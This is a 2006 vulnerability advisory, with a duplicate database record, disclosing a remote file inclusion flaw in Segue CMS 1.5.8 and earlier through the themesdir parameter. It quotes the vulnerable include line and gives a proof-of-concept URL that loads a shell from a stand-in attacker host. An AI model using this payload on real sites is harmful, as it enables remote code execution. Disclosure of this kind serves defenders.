+-------------------------------------------------------------------------------------------
+ Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: Segue CMS <= 1.5.8
+ Vendor ............: http://segue.middlebury.edu/
+ Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171
+ Description .......: "Segue is an open source collaborative content management system"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ Segue CMS themes/program/themesettings.inc.php does not intialize the $themesdir variable
+ before using it to include files, assuming register_globals = on, we can intialize the
+ variable in a query string and include a remote file of our choice. Tested and working on
+ version 1.5.4 and 1.5.8 (previous versions may also be affected).
+
+ Vulnerable Code:
+ themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php");
+
+ Proof of Concept:
+ http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-10-19]
{"id": "SECURITYVULNS:DOC:14802", "bulletinFamily": "software", "title": "Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability", "description": "+-------------------------------------------------------------------------------------------\r\n+ Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability\r\n+-------------------------------------------------------------------------------------------\r\n+ Affected Software .: Segue CMS <= 1.5.8\r\n+ Vendor ............: http://segue.middlebury.edu/\r\n+ Download ..........: http://sourceforge.net/project/showfiles.php?group_id=82171\r\n+ Description .......: "Segue is an open source collaborative content management system"\r\n+ Class .............: Remote File Inclusion\r\n+ Risk ..............: High (Remote File Execution)\r\n+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>\r\n+-------------------------------------------------------------------------------------------\r\n+ Details:\r\n+ Segue CMS themes/program/themesettings.inc.php does not intialize the $themesdir variable\r\n+ before using it to include files, assuming register_globals = on, we can intialize the\r\n+ variable in a query string and include a remote file of our choice. Tested and working on\r\n+ version 1.5.4 and 1.5.8 (previous versions may also be affected).\r\n+ \r\n+ Vulnerable Code:\r\n+ themes/program/themesettings.inc.php, line(s) 02: include("$themesdir/$theme/colors.inc.php");\r\n+ \r\n+ Proof of Concept:\r\n+ http://[target]/[path]/themes/program/themesettings.inc.php?themesdir=http://evilsite.com/shell.php?\r\n+-------------------------------------------------------------------------------------------\r\n\r\n# milw0rm.com [2006-10-19]\r\n\r\n", "published": "2006-10-23T00:00:00", "modified": "2006-10-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:14802", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:19", "edition": 1, "viewCount": 51, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6742"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6742"]}]}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645556337, "score": 1659803227}, "_internal": {"score_hash": "407afc6188299d1b0b6ce988ff3f87c5"}}
Segue CMS <= 1.5.8 (themesdir) Remote File Include Vulnerability